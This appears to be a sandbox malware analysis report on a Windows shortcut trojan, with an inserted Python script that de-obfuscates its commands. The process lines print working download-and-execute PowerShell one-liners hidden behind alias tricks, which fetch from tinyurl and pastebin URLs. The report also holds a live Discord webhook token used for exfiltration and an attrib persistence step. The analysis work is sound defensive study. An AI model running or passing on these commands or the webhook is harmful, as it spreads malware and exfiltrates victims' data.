Source: powershell.exe, 00000004.00000002.1775607526.0000012ADAF55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1775607526.0000012ADB098000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACC500000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41EFB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41EF9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41EA48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A422D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A3CDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A4248000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pastebin.com
Source: powershell.exe, 0000000F.00000002.1991384443.00000246A3CDC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACB105000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACC578000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubuserconte
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACB2AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1746329088.0000012ACC578000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41F062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41F033000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A42F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A42C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 0000000F.00000002.1991384443.00000246A42C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACB2AE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtQ
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACAEE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41E5C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A37F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACC167000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1746329088.0000012ACC4DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1746329088.0000012ACB105000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tinyurl.com
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACC167000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1746329088.0000012ACB105000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tinyurl.com/yeykydun
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACB105000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACB73E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41FB1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A4DB9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://0.discor
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACB73E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41FB1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A4DB9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://0.discord.com/
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACAEE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41E589000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41E59D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A37F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A382D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.1775607526.0000012ADB098000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.1775607526.0000012ADB098000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.1775607526.0000012ADB098000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACB62B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41F9E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A4C83000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACB73E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41FB1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A4DB9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACB62B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41F9E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A4C83000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/api/webhooks/128545359042878
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACC60C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41F10E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A43A4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQ
Source: powershell.exe, 0000000F.00000002.1991384443.00000246A43A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A43A0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACB105000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACB767000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41EA48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A3CDC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000004.00000002.1775607526.0000012ADAF55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1775607526.0000012ADB098000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACB275000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1746329088.0000012ACC4DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41EFA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A4238000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACC4DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41EF9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41EFA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A422D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A4238000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACC578000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercont
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACB2AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1746329088.0000012ACC578000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41F062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A42F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACC500000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41EFB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41EFDA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A42F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A4248000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49702 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.10:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.10:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.10:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.10:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.10:49719 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.10:49720 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.10:49722 version: TLS 1.2

System Summary

Source: amsi64_7756.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_2040.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_5024.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7756, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2040, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5024, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FF7BFEFEFA6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FF7BFEFFD52
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FF7BFF0C99C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FF7BFF0B1FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FF7BFF0CA25
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FF7BFF00EFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FF7BFF00ED1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FF7BFEFEAA9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FF7BFEDC712
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FF7BFEDB966
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FF7BFEE96D5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FF7BFEE7E77
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FF7BFEE964C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FF7BFEDD1B1
Source: amsi64_7756.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_2040.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_5024.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7756, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2040, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5024, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine | Classification label: mal96.troj.evad.winLNK@20/15@5/5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vvl0kj3x.5ut.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\conhost.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\forfiles.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: unknown | Process created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: unknown | Process created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
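Added analyst example, not part of the Joe Sandbox report: a Python triage script that resolves the Set-Alias ("sal") indirection in the process command lines above and classifies the URLs recovered from memory. The command lines and URLs are copied from this report. The script assumes %OS% is "Windows_NT" (its documented value on NT-based Windows) in order to resolve the alias named from $env:os offline, and the host role labels in classify_url are the example author's, not the sandbox's.

```python
"""Triage helper for the forfiles.exe -> powershell.exe chain in this report.
Resolves the Set-Alias ("sal") indirection in the command lines so the real
cmdlets become visible, and classifies the URLs recovered from process memory.
All inputs are constructed from the report lines; nothing is fetched or run."""
import re
from urllib.parse import urlparse

# Command lines copied from the "Process created" lines of the report.
CMD_FORFILES_TINYURL = (
    '"C:\\Windows\\System32\\forfiles.exe" /p c:\\windows\\system32 /m notepad.exe /c '
    '"powershell.exe -command powershell -windowstyle h -command '
    "'sal fatbake calc;sal callit iEx; sal $env:os iWr; "
    "calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)'\""
)
CMD_PS_PASTEBIN = (
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -windowstyle h '
    '-command "sal fatbake calc;sal callit iEx; sal $env:os iWr; '
    'calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"'
)
# URLs copied from the "String found in binary or memory" lines of the report.
MEMORY_URLS = [
    "https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_",
    "https://pastebin.com/raw/sA04Mwk2",
    "https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt",
    "https://github.com/Pester/Pester",
    "https://nuget.org/nuget.exe",
]

# Subset of the Windows PowerShell 5.1 default aliases relevant to download-and-run chains.
BUILTIN_ALIASES = {
    "iex": "Invoke-Expression", "iwr": "Invoke-WebRequest", "irm": "Invoke-RestMethod",
    "curl": "Invoke-WebRequest", "wget": "Invoke-WebRequest", "saps": "Start-Process",
}
DANGEROUS = {"Invoke-Expression", "Invoke-WebRequest", "Invoke-RestMethod", "Start-Process"}
# Assumed environment for offline resolution: %OS% is "Windows_NT" on NT-based Windows.
ASSUMED_ENV = {"os": "Windows_NT"}
ALIAS_CMDS = {"sal", "set-alias", "nal", "new-alias"}
TOKEN = re.compile(r"[A-Za-z_][\w-]*")
URL = re.compile(r"(?:https?://)?[\w.-]+\.[a-z]{2,}(?:/[^\s'\")]*)?", re.I)


def extract_script(cmdline):
    """Return the body of the last -command argument with its outer quotes removed."""
    i = cmdline.lower().rfind("-command")
    return cmdline[i + len("-command"):].strip().strip("'\"") if i >= 0 else ""


def resolve(name, aliases):
    """Map an alias to its canonical cmdlet; PowerShell alias lookup is case-insensitive."""
    key = name.lower()
    return aliases.get(key, BUILTIN_ALIASES.get(key, name))


def analyze(cmdline):
    """Resolve alias definitions, rewrite the remaining statements, and flag behaviours."""
    aliases, flags, rewritten = {}, set(), []
    for stmt in (s.strip() for s in extract_script(cmdline).split(";") if s.strip()):
        parts = stmt.split()
        if parts[0].lower() in ALIAS_CMDS and len(parts) >= 3:
            name, target = parts[1], parts[2]
            if name.lower().startswith("$env:"):  # the alias *name* comes from the environment
                name = ASSUMED_ENV.get(name[5:].lower(), name)
                flags.add("env-derived-alias")
            aliases[name.lower()] = resolve(target, aliases)
            if aliases[name.lower()] in DANGEROUS:
                flags.add("alias-obfuscation")
            continue
        rewritten.append(TOKEN.sub(lambda m: resolve(m.group(0), aliases), stmt))
    text = " ".join(rewritten)
    if "Invoke-Expression" in text and re.search(r"Invoke-(WebRequest|RestMethod)", text):
        flags.add("download-and-execute")
    if re.search(r"forfiles\.exe.*\s/c\s.*powershell", cmdline, re.I):
        flags.add("forfiles-launcher")  # LOLBin used to start PowerShell indirectly
    if re.search(r"-windowstyle\s+h", cmdline, re.I):
        flags.add("hidden-window")
    return {"aliases": aliases, "deobfuscated": rewritten,
            "urls": URL.findall(text), "flags": sorted(flags)}


def classify_url(url):
    """Label a recovered URL by the role its host plays in this chain (author's labels)."""
    p = urlparse(url if "://" in url else "http://" + url)
    host = (p.hostname or "").lower()
    if host == "discord.com" and p.path.startswith("/api/webhooks/"):
        return "Discord webhook (exfiltration / C2 channel)"
    return {"tinyurl.com": "URL shortener (redirect to payload)",
            "pastebin.com": "paste site (raw payload)",
            "raw.githubusercontent.com": "raw GitHub file (payload hosting)",
            }.get(host, "unclassified; review manually")


if __name__ == "__main__":
    for cmd in (CMD_FORFILES_TINYURL, CMD_PS_PASTEBIN):
        result = analyze(cmd)
        print("flags:", ", ".join(result["flags"]))
        for line in result["deobfuscated"]:
            print("  deobfuscated:", line)
        for u in result["urls"]:
            print("  url:", u, "->", classify_url(u))
    for u in MEMORY_URLS:
        print("memory string:", classify_url(u), "->", u)
```

The point of the alias chain is that `sal $env:os iWr` creates an alias whose name is the value of %OS%, so `WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing` is Invoke-WebRequest and `calliT(...)` is Invoke-Expression; `sal fatbake calc` is never used and only pads the line. The final statement contains neither "iex" nor "iwr", so a keyword match on the executing statement alone misses it, but the `sal ... iEx` / `sal ... iWr` definitions are still in the same command line, which is why the resolver keys on alias definitions rather than on the literal cmdlet names.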
Source: C:\Windows\System32\forfiles.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
